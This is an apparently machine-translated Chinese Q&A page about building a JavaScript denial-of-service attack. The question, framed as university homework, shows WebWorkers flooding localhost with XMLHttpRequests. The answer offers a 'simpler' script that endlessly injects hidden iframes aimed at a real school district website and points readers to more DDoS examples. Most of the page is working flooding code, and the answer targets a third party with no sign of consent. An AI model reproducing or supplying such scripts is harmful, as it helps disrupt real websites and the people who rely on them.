使用WebWorkers的JavaScript DoS攻擊

在大學，我們做了一些「功課」來嘗試執行拒絕服務攻擊。我決定採取一些與衆不同的方式。我試圖用JavaScript來執行它。使用WebWorkers的JavaScript DoS攻擊

的問題是：

它甚至可以這樣做呢？
如果我在迴環上做HttpRequest，我會看到由於HTTP端口溢出導致的任何網站不可訪問的結果嗎？
有沒有比我更好的代碼來做到這一點？

的index.html：

<script> 
    for(var i = 0; i< 50; i++) { 
     worker = new Worker("worker.js"); 
     worker.postMessage('Hello World'); 
    } 
</script>

worker.js：

self.addEventListener('message', function(e) { 
    while(1) { 
      var xmlHttp = new XMLHttpRequest(); 
      xmlHttp.onreadystatechange = function() { 
      if (xmlHttp.readyState == 4 && xmlHttp.status == 200) 
        callback(xmlHttp.responseText); 
      } 
      xmlHttp.open("GET", "http://127.0.0.1", true); 
      xmlHttp.send(null); 
    } 
}, false);

謝謝你的任何輸入！

來源

2017-04-01 TomasB

我不知道，但是這是更容易崩潰自己的電腦不是遠程服務器（如你選擇的不是localhost）'while（1）' – mehulmpt

當你運行顯示的代碼時發生了什麼？瀏覽器用'while（1）'很酷嗎？ – nnnnnn

@nnnnnn瀏覽器似乎很好，因爲網絡工作者在場景中做了所有事情。在開發人員工具中，您可以清楚地看到請求正在發送，但是我可以去任何我想要的網站，而無論如何。 – TomasB

-1

所以首先，如果我可以改進這個代碼，我會使用setInterval而不是while（1）。其次，我發現了一個更簡單的版本在這裏：

function _DDoS(url){ 
    document.body.innerHTML+='<iframe src="'+url+'" style="display:none;"> </iframe>'; 
} 
for(;;){ 
setTimeout(_DDoS("http://www.mvcsc.k12.in.us"),10); 
}

只是搜索的JavaScript DDOS，你會發現很多例子

來源

2017-05-15 21:10:47

使用WebWorkers的JavaScript DoS攻擊

回答

相關問題